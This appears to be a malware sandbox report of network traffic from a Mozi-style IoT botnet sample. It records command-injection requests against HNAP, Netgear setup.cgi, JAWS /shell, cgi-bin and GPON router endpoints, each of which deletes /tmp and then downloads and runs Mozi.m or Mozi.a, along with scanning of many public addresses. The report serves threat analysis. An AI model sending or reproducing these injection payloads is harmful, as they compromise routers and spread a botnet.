30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 220.130.214.100:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 3.11.29.16:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Sample listens on a socket
Source: /tmp/rIbyGX66Op (PID: 4601) Socket: 0.0.0.0::54753
Source: unknown TCP traffic detected without corresponding DNS query: 178.40.184.137
Source: unknown TCP traffic detected without corresponding DNS query: 140.39.206.54
Source: unknown TCP traffic detected without corresponding DNS query: 34.8.155.116
Source: unknown TCP traffic detected without corresponding DNS query: 108.184.4.136
Source: unknown TCP traffic detected without corresponding DNS query: 221.160.8.201
Source: unknown TCP traffic detected without corresponding DNS query: 108.39.69.131
Source: unknown TCP traffic detected without corresponding DNS query: 3.51.62.125
Source: unknown TCP traffic detected without corresponding DNS query: 67.118.131.139
Source: unknown TCP traffic detected without corresponding DNS query: 28.86.70.243
Source: unknown TCP traffic detected without corresponding DNS query: 89.235.62.86
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.82.42
Source: unknown TCP traffic detected without corresponding DNS query: 171.112.221.128
Source: unknown TCP traffic detected without corresponding DNS query: 85.117.188.205
Source: unknown TCP traffic detected without corresponding DNS query: 105.109.18.186
Source: unknown TCP traffic detected without corresponding DNS query: 29.5.215.81
Source: unknown TCP traffic detected without corresponding DNS query: 8.114.30.17
Source: unknown TCP traffic detected without corresponding DNS query: 19.112.11.89
Source: unknown TCP traffic detected without corresponding DNS query: 4.186.238.93
Source: unknown TCP traffic detected without corresponding DNS query: 85.124.222.42
Source: unknown TCP traffic detected without corresponding DNS query: 212.9.178.122
Source: unknown TCP traffic detected without corresponding DNS query: 123.152.1.95
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.32.133
Source: unknown TCP traffic detected without corresponding DNS query: 138.94.203.237
Source: unknown TCP traffic detected without corresponding DNS query: 132.84.208.189
Source: unknown TCP traffic detected without corresponding DNS query: 84.219.17.176
Source: unknown TCP traffic detected without corresponding DNS query: 165.94.66.173
Source: unknown TCP traffic detected without corresponding DNS query: 116.56.146.125
Source: unknown TCP traffic detected without corresponding DNS query: 163.60.176.218
Source: unknown TCP traffic detected without corresponding DNS query: 174.9.64.0
Source: unknown TCP traffic detected without corresponding DNS query: 217.196.154.24
Source: unknown TCP traffic detected without corresponding DNS query: 43.162.206.133
Source: unknown TCP traffic detected without corresponding DNS query: 197.46.69.196
Source: unknown TCP traffic detected without corresponding DNS query: 79.58.62.70
Source: unknown TCP traffic detected without corresponding DNS query: 180.195.241.242
Source: unknown TCP traffic detected without corresponding DNS query: 113.203.125.76
Source: unknown TCP traffic detected without corresponding DNS query: 190.166.22.140
Source: unknown TCP traffic detected without corresponding DNS query: 124.94.21.94
Source: unknown TCP traffic detected without corresponding DNS query: 18.184.123.158
Source: unknown TCP traffic detected without corresponding DNS query: 125.178.212.248
Source: unknown TCP traffic detected without corresponding DNS query: 181.215.101.174
Source: unknown TCP traffic detected without corresponding DNS query: 146.97.112.184
Source: unknown TCP traffic detected without corresponding DNS query: 179.8.250.180
Source: unknown TCP traffic detected without corresponding DNS query: 5.71.214.240
Source: unknown TCP traffic detected without corresponding DNS query: 113.237.9.87
Source: unknown TCP traffic detected without corresponding DNS query: 182.151.134.212
Source: unknown TCP traffic detected without corresponding DNS query: 75.104.12.143
Source: unknown TCP traffic detected without corresponding DNS query: 65.192.2.39
Source: unknown TCP traffic detected without corresponding DNS query: 83.106.49.27
Source: unknown TCP traffic detected without corresponding DNS query: 100.221.5.250
Source: unknown TCP traffic detected without corresponding DNS query: 74.164.3.48
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.90.159.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 69.195.90.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.72.178.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.217.3.9:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
